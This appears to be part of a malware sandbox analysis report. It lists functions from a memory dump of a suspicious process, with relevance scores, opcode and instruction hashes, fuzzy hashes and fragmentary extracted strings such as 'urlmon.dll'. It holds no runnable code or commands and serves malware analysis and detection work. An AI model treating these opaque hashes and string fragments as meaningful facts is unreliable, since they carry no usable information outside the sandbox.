                                    • Opcode Fuzzy Hash: c506c07a7fb7a7a5ab1f9fc5346c668fe839d99c65d23dcb370c02087194abf8
                                    • Instruction Fuzzy Hash: FC31B21165D3F14ED31E836D08BDA79AEC28F5720174EC2EEDADA5F2E3C0888418D3A5
                                    Function 04BA4C09 Relevance: 54.3, Strings: 43, Instructions: 599COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: !\$"B$$4$($(X$)$,$,.$5*$6m$9$9$;m$=$E-$F$Gg$K$K9$L$L$M"$MV$P$Q$R$Sz$V$^$`$`_$c$f$h$o0$rj$vt$w$x$~$'$c$z
                                    • API String ID: 0-2341560773
                                    • Opcode ID: 0459221fc1e91769c2fd443da6c3dafdfc535180617c91f77b7154a4461a159b
                                    • Instruction ID: d6649f19d1682622159ecbc5a8af73a5f2913c792695f13179e3d3ef981ff59a
                                    • Opcode Fuzzy Hash: 0459221fc1e91769c2fd443da6c3dafdfc535180617c91f77b7154a4461a159b
                                    • Instruction Fuzzy Hash: 4072A0B0D09228DBEB29CF44C9997DDBBB1BB45308F1085D9C5196B280D7B96BD4CF44
                                    Function 04BB2709 Relevance: 6.4, Strings: 5, Instructions: 147COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 6$O$S$\$s
                                    • API String ID: 0-3854637164
                                    • Opcode ID: 1da14ac81a15a74b3c674812995aa6e3bdc59496ed5cf29fc56ea1c0f6062503
                                    • Instruction ID: 74061cbbec53dd5230da82c2705080c6f7c0c6acffb5f912d05017458aaa4ff9
                                    • Opcode Fuzzy Hash: 1da14ac81a15a74b3c674812995aa6e3bdc59496ed5cf29fc56ea1c0f6062503
                                    • Instruction Fuzzy Hash: 254185B2900219BBEB14EBD5AD89EEBB3B8EF44314F0445D9E90896100E6B1BA548BD1
                                    Function 04BBEFE9 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: o`Eo
                                    • API String ID: 0-1523922144
                                    • Opcode ID: 0c4dd874b3748cdf825ccafa87b67e457db0080c6766c89311685d8df6cfa294
                                    • Instruction ID: 0c7adb1f46aafbf7d1c252ef7930437bfed803a428a4fafface0f1d5767e9cfe
                                    • Opcode Fuzzy Hash: 0c4dd874b3748cdf825ccafa87b67e457db0080c6766c89311685d8df6cfa294
                                    • Instruction Fuzzy Hash: 6411F4B2D0111CAF9B00DFE9D9419EFB7F9EF48200F0441AAE915E7200E7715A148BA1
                                    Function 04BC0219 Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: <&
                                    • API String ID: 0-3760713469
                                    • Opcode ID: e610241b9a13561d8d23edc1cc0bef27bd449ea70ce02e0944cef1636c5d9ac7
                                    • Instruction ID: 680a61bfcb71184e7c941005183122e7223950f9dc8d2312bb7ab0f54e10e051
                                    • Opcode Fuzzy Hash: e610241b9a13561d8d23edc1cc0bef27bd449ea70ce02e0944cef1636c5d9ac7
                                    • Instruction Fuzzy Hash: A811D3B6D1121DAF9F00DFE9D9409EEBBF9EF48210F04416BE919E7200E7705A148BA1
                                    Function 04BBFB79 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: :y
                                    • API String ID: 0-1302922526
                                    • Opcode ID: 9ac0043135563faedb501d74aadd83b47cfffabdc3b8cdb9ca1a7b45265265b4
                                    • Instruction ID: 0a2c99ec06d7d8b42773d7b8748ad6756a70913d480cbac6482954c7f0ed3584
                                    • Opcode Fuzzy Hash: 9ac0043135563faedb501d74aadd83b47cfffabdc3b8cdb9ca1a7b45265265b4
                                    • Instruction Fuzzy Hash: 9A1112B2D0121CAF9B00DFE9DC409EEBBF8EF48210F0441ABE919E3200E7705A458BA1
                                    Function 04BBEF59 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: -z
                                    • API String ID: 0-3508785202
                                    • Opcode ID: 3177c4ac56b80b0bc97f372d545b7be9a862f7ca35d4e5fac9895b70ddc10d1f
                                    • Instruction ID: 7fa720f112faa9a778d9372c5fa49d1b573c90e6ad5816c301fc9d67499c2d7e
                                    • Opcode Fuzzy Hash: 3177c4ac56b80b0bc97f372d545b7be9a862f7ca35d4e5fac9895b70ddc10d1f
                                    • Instruction Fuzzy Hash: 8501E9B2D11218AFDB40DFE8D9409EEBBF9AB18600F1446AAD915F3201E7705A148BA1
                                    Function 04B9E739 Relevance: .1, Instructions: 130COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1dc2213b4ca5915a17b06a44cd323d92dbebac4f849a3c1cc55f42ac45f7980a
                                    • Instruction ID: 8fa62a8bfa7586db91b901917a754e1a547d2c9cbebce3d037b8349af81ba151
                                    • Opcode Fuzzy Hash: 1dc2213b4ca5915a17b06a44cd323d92dbebac4f849a3c1cc55f42ac45f7980a
                                    • Instruction Fuzzy Hash: FB412FB1D11218AFDB14CF99DC81AEEBBBCEF48710F10415AF914E6240E7B4AA40CBE1
                                    Function 04BC2849 Relevance: .1, Instructions: 98COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6f2ba7e18a4266f001064aef61e5deb6503efa637d4ae4d4b28708f0aa72d344
                                    • Instruction ID: bab8a851d9e43d752a5c7712affa4519e071095cb9281b5ee91c3f1011d7ce6a
                                    • Opcode Fuzzy Hash: 6f2ba7e18a4266f001064aef61e5deb6503efa637d4ae4d4b28708f0aa72d344
                                    • Instruction Fuzzy Hash: 9631E2B5A00209ABDB04DF99D880EEEB7F9AF8C314F108259F919A3340D774A9118FA4
                                    Function 04BC29A9 Relevance: .1, Instructions: 90COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b1cd31cec012f2a3f82fb82dc9ec57123c7f30fd2f4f7fc8eb654dd285773076
                                    • Instruction ID: 364a2a0f998d94b73112059faca286e0d86b200c76212ffc80a16612934eeb1f
                                    • Opcode Fuzzy Hash: b1cd31cec012f2a3f82fb82dc9ec57123c7f30fd2f4f7fc8eb654dd285773076
                                    • Instruction Fuzzy Hash: BA3108B5A00209ABDB14DF99D881EEFB7F9EF8C314F108659FD18A3240D774A9118FA4
                                    Function 04BC2289 Relevance: .1, Instructions: 82COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d79e9512ca02fc6fea4f90017a66403eebae15c9e315f01cda177bb0d36b4c39
                                    • Instruction ID: b8cc9b081131213fe6da87d5763f0692d68b33bb9a0c54b498596fa30c676777
                                    • Opcode Fuzzy Hash: d79e9512ca02fc6fea4f90017a66403eebae15c9e315f01cda177bb0d36b4c39
                                    • Instruction Fuzzy Hash: 0A21F7B5A04209ABEB14DF99DC85EEF77E8EF8C304F00855AFD18A7240D674B8118FA5
                                    Function 04B9E87D Relevance: .1, Instructions: 78COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e569c955d5d79abb64dc5e8bc7df6be0b6f2ded2d7af798564927158a0025944
                                    • Instruction ID: 4724043f9cec4501de494e7f6cdd78249e4f0af7d507803e1dc93316936c7653
                                    • Opcode Fuzzy Hash: e569c955d5d79abb64dc5e8bc7df6be0b6f2ded2d7af798564927158a0025944
                                    • Instruction Fuzzy Hash: D91187B2900115AFEB14CA96DC85EEBBBACEFC5320F1445A9F91897241D6B1F901C7E1
                                    Function 04BB2549 Relevance: .1, Instructions: 75COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 297fc3b44c081086d1caaa4f9b515c004202a26fbb1835fc51f1bcf537f375ee
                                    • Instruction ID: cf810632c6d9ab472d9d5c6c0176d7e1bd6dd081fbcb6156dbf48ba3f64a74ff
                                    • Opcode Fuzzy Hash: 297fc3b44c081086d1caaa4f9b515c004202a26fbb1835fc51f1bcf537f375ee
                                    • Instruction Fuzzy Hash: 4F1186B23802057BF724AA969C83FAB375CDB85B15F244099FB04AF1C1D6F4F91146B8
                                    Function 04BC2BB9 Relevance: .1, Instructions: 74COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0c0b4b50d03e1b08fc0a92ed0745af71bc6b645a82747714c303a31fad3b30f6
                                    • Instruction ID: 486a1fab64728db76afc67e6cf1bc78815567474416e121a29ad31ad29a84443
                                    • Opcode Fuzzy Hash: 0c0b4b50d03e1b08fc0a92ed0745af71bc6b645a82747714c303a31fad3b30f6
                                    • Instruction Fuzzy Hash: 67213DB5A00209ABEB14DF99DC81FDFB7A8EF88310F008559FD18A7240E774B9118BA5
                                    Function 04BBF489 Relevance: .1, Instructions: 62COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 746f05f7788d8f69450570d78d5565f0b27b02e87db95d9be42b120d95cfdd6a
                                    • Instruction ID: 10425a23e8b53d0f10131754936ffc7fa3d5ad2e46bfbfb3c762f234d19149f2
                                    • Opcode Fuzzy Hash: 746f05f7788d8f69450570d78d5565f0b27b02e87db95d9be42b120d95cfdd6a
                                    • Instruction Fuzzy Hash: 8311ADB6D01219AF9B40DFA9D9409EFBBF9EB58210F1441ABE915E7200E6705A048BA1
                                    Function 04BC1F49 Relevance: .1, Instructions: 62COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2b4fc07aea92ba81217fd7c1098d3cdfbca581601c2335a24012210f2338dc1d
                                    • Instruction ID: e24219b9c9580935597874fb62fa181d34d579fc3c9bad9ffc11f995d6b6f2a3
                                    • Opcode Fuzzy Hash: 2b4fc07aea92ba81217fd7c1098d3cdfbca581601c2335a24012210f2338dc1d
                                    • Instruction Fuzzy Hash: BB1194716006047BE710EFA8DC45FAB73ACEF89614F008559FD1967280D770B9118BA5
                                    Function 04BC20A9 Relevance: .1, Instructions: 62COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 29bf5a0d2a396fb666c72a3444a8688922c9b016de459162dab6ece4f2ed2d9a
                                    • Instruction ID: b2136ac25055d497c97f817ab2b4b2b2ec1b8edef059bafcbb2fd2ec0e2b330d
                                    • Opcode Fuzzy Hash: 29bf5a0d2a396fb666c72a3444a8688922c9b016de459162dab6ece4f2ed2d9a
                                    • Instruction Fuzzy Hash: 5111A7716042147BE710EFA9DC45FAB77ACDF89614F00855EFD1867280D774B5118FA1
                                    Function 04BBB949 Relevance: .1, Instructions: 59COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7979f273ad54cb4525ee8336784a11277a19df5c0f2ee1955d1719438caf4817
                                    • Instruction ID: 4c7c4764786f11216de6176efa596014f137d845c3573820728a27fc5226ddf7
                                    • Opcode Fuzzy Hash: 7979f273ad54cb4525ee8336784a11277a19df5c0f2ee1955d1719438caf4817
                                    • Instruction Fuzzy Hash: 2A01B5B6A002187BF714EAA4DC85DEF736CDF45214F0002DAFD1897241FAB0BE528AE5
                                    Function 04B9E72A Relevance: .1, Instructions: 51COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 01f50e6fe848f12abc89d7e3ba2481aae4480743074249ffca831b9ecf9d2e2b
                                    • Instruction ID: 2d34c32c9e166666e5505e419d6ea96452b540dbd696505431f01ecf51f6993d
                                    • Opcode Fuzzy Hash: 01f50e6fe848f12abc89d7e3ba2481aae4480743074249ffca831b9ecf9d2e2b
                                    • Instruction Fuzzy Hash: 3D11FAB1D21229AF8F00CFA998845EDBBF8FA49720F10855BF858E7200D7B09A518FD4
                                    Function 04BC2F09 Relevance: .0, Instructions: 47COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c6e99a57c4e07f766d75fb7922e620f08570094a86bf9a7d7399b37cdde083c4
                                    • Instruction ID: 27da22095068ed38f79b0bcdf2d600455acb4c9aebe27caada93292aa8ef817c
                                    • Opcode Fuzzy Hash: c6e99a57c4e07f766d75fb7922e620f08570094a86bf9a7d7399b37cdde083c4
                                    • Instruction Fuzzy Hash: 750180B6205108BBDB44DF99DC80EEB77ADAF8C714F518259BA19A3244D630F8518BA4
                                    Function 04B9E889 Relevance: .0, Instructions: 40COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 47768fe77eaf4c2ebfa5c9f925e232530c023efc340fd02a46615d8820e3cc67
                                    • Instruction ID: 09f8c25546d22f4a4ebf11e327423efa7cbac32fc236a7893b8db5dfc5edb459
                                    • Opcode Fuzzy Hash: 47768fe77eaf4c2ebfa5c9f925e232530c023efc340fd02a46615d8820e3cc67
                                    • Instruction Fuzzy Hash: BCF0A773A002166BEB109AADBCC4B96B7DCFB89334F240672F95CD7281D671F85186E0
                                    Function 04BA593D Relevance: .0, Instructions: 34COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1c44ca68d18b9b71c860152480c03bb9ab5fef003ed8db6a4d01bd95a86ba960
                                    • Instruction ID: 6a5ea213e4c3306f00dc7d12050ef0c8522bf9c4692b1548453f2618e040fdb7
                                    • Opcode Fuzzy Hash: 1c44ca68d18b9b71c860152480c03bb9ab5fef003ed8db6a4d01bd95a86ba960
                                    • Instruction Fuzzy Hash: 8FE0C27230812ABB9B10EE98AC009EE739CDE5657470841D1FE0CDF601E261FE3143E5
                                    Function 04BC2199 Relevance: .0, Instructions: 33COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 44ae07883cbd01b6d2a37bc254970c9f418910fc6d13896ce739d5f85aec79a1
                                    • Instruction ID: 968373cf8289398abef4a1f7dbe768bdf8b00bdc517e6e63500dfeb2dc2cde32
                                    • Opcode Fuzzy Hash: 44ae07883cbd01b6d2a37bc254970c9f418910fc6d13896ce739d5f85aec79a1
                                    • Instruction Fuzzy Hash: A0F01CB5200209BBDB10EF99DC81E9B77ACEFC8714F108419FA18A7240D670B9118BB4
                                    Function 04BB2702 Relevance: .0, Instructions: 32COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 643a7621eb10bba5e14b4fa7303a150531b40588bc20dbc2d0e94507e6f9a698
                                    • Instruction ID: 2443cd862566f8a79ed0611ef928aa34bfe9d7fceb33144300cdbc8dba088761
                                    • Opcode Fuzzy Hash: 643a7621eb10bba5e14b4fa7303a150531b40588bc20dbc2d0e94507e6f9a698
                                    • Instruction Fuzzy Hash: D3F0A7B1944218BAEB24FBF4ED89EBA73FCEB48304F0051C9BD0997141E571AE944A96
                                    Function 04BC2E29 Relevance: .0, Instructions: 29COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2cbc616066dca2fff9d95f765f5f3f61b90155f19f2508db422bbec96e683eca
                                    • Instruction ID: 93936a25e133e356c7f0875cca5523f61ac6b09cb34006efcb56de86840bb309
                                    • Opcode Fuzzy Hash: 2cbc616066dca2fff9d95f765f5f3f61b90155f19f2508db422bbec96e683eca
                                    • Instruction Fuzzy Hash: 4AE06576204209BBEA14EF99EC84EAB73ACEFC8714F004459F908A7240D670B8108AB8
                                    Function 04BB2669 Relevance: .0, Instructions: 29COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e6eeadf7b1559f57e7846a93a7e434bb6d57658e972a3954147908ec06b93be9
                                    • Instruction ID: 99d95e58ab92f8f8546cefeae09bf03388b823e7aa89c8af7b8c84a49a922f3f
                                    • Opcode Fuzzy Hash: e6eeadf7b1559f57e7846a93a7e434bb6d57658e972a3954147908ec06b93be9
                                    • Instruction Fuzzy Hash: 88F08271D1520DEBDB18CFA4D841BDDBBB4EB04320F1087EEE8259B280E634A7508781
                                    Function 04BC4AD9 Relevance: .0, Instructions: 28COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fee4d80f25b739acdfb4f48713f4944bc21d8a68324ec215f6b898b3b9ae2327
                                    • Instruction ID: 0745407c1e09190da642b731126010fc559cd86d076386f2197ee5526d19f47e
                                    • Opcode Fuzzy Hash: fee4d80f25b739acdfb4f48713f4944bc21d8a68324ec215f6b898b3b9ae2327
                                    • Instruction Fuzzy Hash: B6E04F72B0061477D22055899C95FA7775CDBC5B62F1900A9FE089B340E5A0BA0182E4
                                    Function 04BB2666 Relevance: .0, Instructions: 26COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5e1e01e14e2c5814b5d43f4d9eb61d9047a27fb2e767b941aa31c9831e89f240
                                    • Instruction ID: 0a3deb7b0864305458c51a49be6b8e33b4a9fb4e788aac17820aad88b4685884
                                    • Opcode Fuzzy Hash: 5e1e01e14e2c5814b5d43f4d9eb61d9047a27fb2e767b941aa31c9831e89f240
                                    • Instruction Fuzzy Hash: 3CF0657591510CABEB18DF64D441AEDBB74DB04310F1047EEE815DB280D635D7559781
                                    Function 04BC2B29 Relevance: .0, Instructions: 25COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 72b71f9a6b8d339d6c9fae34c2719ce30272c9944d81a440af5fa0689e489d0b
                                    • Instruction ID: c68982fc840fad6497450634786917984a022bbe173d191478768d90650a1aab
                                    • Opcode Fuzzy Hash: 72b71f9a6b8d339d6c9fae34c2719ce30272c9944d81a440af5fa0689e489d0b
                                    • Instruction Fuzzy Hash: 5BE086362042047BE510FB59DC45F97779CDFC5714F418069FA0867141C670B9118BF0

                                    Non-executed Functions

                                    Function 04BAE929 Relevance: 51.4, Strings: 41, Instructions: 166COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                    • API String ID: 0-3248090998
                                    • Opcode ID: 88d2f9759e5af378ae688ea4fd5311552ce04c6e866e263db9e13d76fe42414d
                                    • Instruction ID: 6d73938b3e2086ab7d54bd7bc3b06377562e981f917155dc0209f48eee8ac435
                                    • Opcode Fuzzy Hash: 88d2f9759e5af378ae688ea4fd5311552ce04c6e866e263db9e13d76fe42414d
                                    • Instruction Fuzzy Hash: 249100F08052A98ECB118F55A4603DFBF71BB85204F1581E9C6AA7B243C3BE4E45DF90
                                    Function 04BBC5F9 Relevance: 34.0, Strings: 27, Instructions: 261COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                    • API String ID: 0-1002149817
                                    • Opcode ID: 54b57e0d0ba43a92f509b8394dcea6ff2e7ebfca9ec7307d98c7ce183daa6f0f
                                    • Instruction ID: b50573ead85517a9c4a2e22b81135003def9902a7431ca936550ef2ba87876e9
